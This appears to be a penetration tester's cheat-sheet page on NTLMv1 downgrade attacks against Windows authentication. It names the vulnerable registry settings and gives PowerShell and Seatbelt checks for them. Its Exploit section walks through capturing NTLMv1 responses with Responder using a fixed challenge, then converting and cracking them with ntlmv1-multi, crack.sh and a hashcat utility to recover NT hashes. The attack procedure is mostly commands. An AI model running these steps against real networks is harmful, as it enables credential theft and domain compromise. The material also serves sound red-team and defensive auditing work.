Comment on page

NTLMv1 Downgrade

​https://github.com/NotMedic/NetNTLMtoSilverTicket​
​https://www.praetorian.com/blog/ntlmv1-vs-ntlmv2/​
​https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/​
​https://www.r-tec.net/r-tec-blog-netntlmv1-downgrade-to-compromise.html​
Client sends NTLMv1 response when LmCompatibilityLevel exists and is 2 or lower, which can be downgraded to "NTLMv1 w/o SSP" when NtlmMinClientSec is 0x20 or lower:
Property Name
Property Path
​LmCompatibilityLevel​
HKLM\SYSTEM\CurrentControlSet\Control\Lsa
​NtlmMinClientSec​
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0
Check
Check with PowerShell:
PS > (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name LmCompatibilityLevel).LmCompatibilityLevel
2
PS > $decValue = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ -Name NtlmMinClientSec).NtlmMinClientSec
PS > $hexValue = "0x" + [string]::Format("{0:x}", $decValue)
PS > $hexValue
0x20
Check with Seatbelt (example):
Cmd > .\Seatbelt.exe NTLMSettings
Exploit
Authentication Coercion
Exploit with Responder with a known challenge of 1122334455667788 (see Authentication Coercion to trigger callbacks):
$ sudo ./Responder.py -I eth0 -v --lm --disable-ess
ntlmv1-multi + crack.sh
​https://crack.sh/netntlm/​
​https://crack.sh/get-cracking/​
​https://crack.sh/cracking-ntlmv1-w-ess-ssp/​
​https://github.com/evilmog/ntlmv1-multi​
Calculate the token:
$ python ntlmv1.py --ntlmv1 '<NTLMv1_RESPONSE_STRING>'
Check the final 2 bytes (4 characters) of the NT hash:
$ ~/tools/hashcat-utils/src/ct3_to_ntlm.bin <CT3> 1122334455667788

Property Name	Property Path
LmCompatibilityLevel	`HKLM\SYSTEM\CurrentControlSet\Control\Lsa`
NtlmMinClientSec	`HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0`

Last modified 2mo ago